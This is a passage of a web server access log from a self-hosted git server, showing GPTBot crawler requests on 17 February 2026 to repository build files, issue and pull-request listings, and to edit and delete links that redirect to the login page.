"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:18:31:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:18:31:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11316] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:18:31:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11316] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:18:31:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:18:31:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11122] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:18:31:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11745] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:18:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16036] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:18:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11316] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:18:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16071] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:18:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 226366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.ico" -[17/Feb/2026:18:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=open&type=all" -[17/Feb/2026:18:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" -[17/Feb/2026:18:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=rendered" [Client 74.7.227.38] [Length 12536] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:18:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=source" [Client 74.7.227.38] [Length 13299] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:18:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13769] [Gzip 4.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build" -[17/Feb/2026:18:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:32:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:32:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:32:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:32:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:32:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:32:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:18:32:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 1489] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:32:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 11143] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:18:32:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 11141] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:18:32:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:32:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:32:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15269] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:32:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15268] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15195] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11138] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:32:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:32:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15192] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11139] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:32:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" -[17/Feb/2026:18:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" -[17/Feb/2026:18:32:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" -[17/Feb/2026:18:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" -[17/Feb/2026:18:32:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" -[17/Feb/2026:18:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" -[17/Feb/2026:18:32:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr 